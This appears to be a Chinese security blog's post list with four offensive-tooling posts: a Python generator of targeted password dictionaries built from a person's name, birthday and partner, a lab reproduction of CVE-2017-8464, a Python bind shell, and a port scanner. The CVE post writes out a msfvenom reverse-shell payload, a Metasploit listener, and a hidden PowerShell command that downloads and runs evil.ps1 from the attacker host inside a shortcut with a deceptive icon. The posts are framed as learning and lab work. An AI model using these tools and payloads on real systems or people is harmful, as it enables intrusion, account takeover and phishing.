admin 发布的文章

社工密码生成

看了大量报告就知道一个短小精悍的字典有多重要。
本来想写根据键盘布局设置的密码字典的,类似

  • qwerty

  • qwer1234

  • q1w2e3r4

  • qazwsx

  • qwer!@#

  • asdf8888

  • ......
    CSDN_TOP_5K来看,这种根据键盘布局设置的密码应该是最高频的一类密码,至少在程序猿界是这样的。

但是这种密码太灵活了,没写出来,只好写了个简单的。
只写了两种属性组合方式,生日+密码和配偶+关键词,以后再添加有用的组合。

#! /usr/bin/env python
# coding: utf-8
'''
社工字典生成
date: 2017/6/17
'''
import string

global pwdList
pwdList = []

# 目标属性
class Person:
    NAME = "han tie gun"
    BIRTHDAY = "1926 08 17"
    PARTNER = 'wang gang dan'
    LOVE_KEYS = ['520', '1314', '5201314', '1314520', '2920184', 'love']
    SYMBOL = ['!', '@', '#', '_', '-', ',', '.', '!@#', '$%^']

# 属性拓展
def get_name(name):
    nameList = []
    nameList.append(string.capwords(name).replace(' ', ''))     # 声母大写
    nameList.append(name.capitalize().replace(' ', ''))     # 首字母大写
    nameList.append(''.join(name.split()[0:1]))    # 姓
    nameList.append(''.join(name.split()[0:1]).capitalize())    # 姓首字母大写
    nameList.append(''.join(name.split()[1:]))  # 名
    jianping = [one[0:1] for one in name.split(' ')]    # 简拼
    jianping = ''.join(jianping)
    nameList.append(jianping)
    nameList.append(jianping.upper())
    return nameList

def get_birthday(day):
    dayList = []
    dayList.append(day.replace(' ', ''))    # 年月日
    dayList.append(day.replace(' ', '')[0:6])   # 年月
    dayList.append(day.replace(' ', '')[4:])    # 月日
    dayList.append(day.replace(' ', '')[0:4])   # 年
    return dayList

def get_partner(partner):
    partnerList = get_name(partner)
    return partnerList

def get_lovekeys(keys):
    lovekeysList = keys
    return lovekeysList

def get_symbol(symbols):
    return symbols

nameList = get_name(Person.NAME)
birthdayList = get_birthday(Person.BIRTHDAY)
partnerList = get_partner(Person.PARTNER)
lovekeys = get_lovekeys(Person.LOVE_KEYS)
symbolList = get_symbol(Person.SYMBOL)

# 属性组合
# 姓名+生日组合
def name_birthday(nameList, birthdayList, symbolList):
    pwdList.extend(nameList)
    pwdList.extend(birthdayList)
    for name in nameList:
        for day in birthdayList:
            for symbol in symbolList:
                pwdList.append(name + day)
                pwdList.append(day + name)
                pwdList.append(name + symbol + day)
                pwdList.append(day + symbol + day)

# 配偶+lovekey组合
def partner_lovekey(partnerList, lovekeys, symbolList):
    for partner in partnerList:
        for love in lovekeys:
            for symbol in symbolList:
                pwdList.append(partner + love)
                pwdList.append(love + partner)
                pwdList.append(partner + symbol + love)
                pwdList.append(love + symbol + partner)

def savefile(pwdList):
    filename = "result.txt"
    with open(filename, "w+") as f:
        for line in pwdList:
            f.write(line + '\n')
    print "\r\n[*] Generated %d lines" % len(pwdList)
    print "[*] The results saved as %s" % filename
if __name__ == '__main__':
    name_birthday(nameList, birthdayList, symbolList)
    partner_lovekey(partnerList, lovekeys, symbolList)
    pwdList = list(set(pwdList))
    savefile(pwdList)

1.png

最近又刚发发现某大佬写的利器,感觉应该很好用,基本上我想要的功能都有,伏地膜-。-

CVE-2017-8464 复现

CVE-2017-8464

简介

通过在快捷方式里注入恶意代码,加载远程的恶意powershell脚本,执行命令。

测试环境

  • KALI: 192.168.6.129

  • windows 2008: 192.168.6.132

过程

  • 生成反弹shell的ps脚本

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.129 lport=4444 -f psh-reflection > /var/www/html/evil.ps1
  • 启动web服务器

service apache2 start
  • 监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.6.129
exploit -jz
  • 制作恶意快捷方式
    1.png

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.6.129/evil.ps1');test.ps1"
  • 技巧
    换个有欺骗性的图标

2.png

  • 上线

3.png

修复

打对应补丁

ps.
其实是个比较鸡肋的洞,甚至都不算漏洞。可能用来钓鱼提权还行。

python版netcat

从《python黑帽子》上学来的,不过简化了它的功能,只保留了shell。其实就是个正向shell。

实现过程

程序分为两部分,client和server。
clinet的功能是:

  1. 连接服务端

  2. 发送命令

  3. 接收命令执行结果

对应的函数为client_sender()

server的功能是:

  1. 建立监听-->server_loop()

  2. 接收命令-->client_handler()

  3. 执行命令-->run_command()

  4. 发送执行结果-->client_handler()

2到4步形成一个循环。

代码

#! /usr/bin/env python
# coding: utf-8

import sys
import socket
import threading
import subprocess
import argparse

listen = False
target = ""
port = 0

def usage():
    parse = argparse.ArgumentParser(description="usage:")
    parse.add_argument("-t", "--target", action="store", default="", help="target host")
    parse.add_argument("-p", "--port", action="store", default="", help="the target port")
    parse.add_argument("-l", "--listen", action="store", default="", help="listen on [host]:[port]")
    args = parse.parse_args()
    return args

# 客户端函数
def client_sender(buffer):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((target, port))
        if len(buffer):
            client.send(buffer)
        # 接收响应
        while True:
            recv_len = 1
            response = ""
            while recv_len:
                data = client.recv(4096)
                recv_len = len(data)
                response += data
                if recv_len < 4096:
                    break
            print response,
            # 输入
            buffer = raw_input("")
            buffer += "\n"
            client.send(buffer)
    except:
        print "\n[*]Exception! Exiting.\n"
    client.close()

# 服务器端
def server_loop():
    global target  # 监听的地址
    if not len(target):
        target = "0.0.0.0"
    # 监听
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    # 接收命令,执行命令,返回执行结果的循环
    while True:
        clien_socket, addr = server.accept()
        print "[*]Connected to %s:%s\n" % (addr[0], addr[1])
        clien_thread = threading.Thread(target=client_handler, args=(clien_socket,))
        clien_thread.start()

def run_command(command):  # 服务端
    command = command.rstrip()
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except:
        output = "Faild to execute command.\r\n"
    return output

# 执行命令,返回执行结果
def client_handler(client_socket):
    while True:
        client_socket.send("<shell:#>")
        cmd_buffer = ""
        while "\n" not in cmd_buffer:
            cmd_buffer += client_socket.recv(1024)
            response = run_command(cmd_buffer)
            client_socket.send(response)

def main():
    global listen
    global port
    global target

    args = usage()
    if len(args.listen):
        listen = True
    if len(args.target):
        target = args.target
    if len(args.port):
        port = int(args.port)

    if not listen and len(target) and port > 0:  # 不监听,只发送数据
        # 输入数据
        buffer = sys.stdin.read()
        # 发送数据
        client_sender(buffer)
    if listen:  # 监听
        server_loop()
if __name__ == "__main__":
    main()

ps: 只能在Linux下使用,客户端连接时以ctrl+d结束输入而非回车。

python端口扫描器

学习python网络编程,写了个tcp的端口扫描,单线程,仅仅为了学习而已。

#! /usr/bin/env python
# coding:utf-8
# 端口扫描
import argparse
import socket
import time

def scan(ip, port):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(3)
        status = s.connect_ex((ip, port))
        return status
    except:
        return

def scanport():
    start_time = time.time()
    print u"开放的端口: "
    for port in range(start_port, end_port+1):
        status = scan(target_ip, port)
        if status == 0:
            print "* %s --- open" % str(port)
    print u"扫描结束,耗时: %s s." % (time.time() - start_time)
if __name__ == "__main__":
    parse = argparse.ArgumentParser()
    parse.add_argument("host", action="store", help="The target host")
    parse.add_argument("start", action="store", help="The start port")
    parse.add_argument("end", action="store", help="The end port")
    args = parse.parse_args()

    target_ip = socket.gethostbyname(args.host)
    start_port = int(args.start)
    end_port = int(args.end)

    scanport()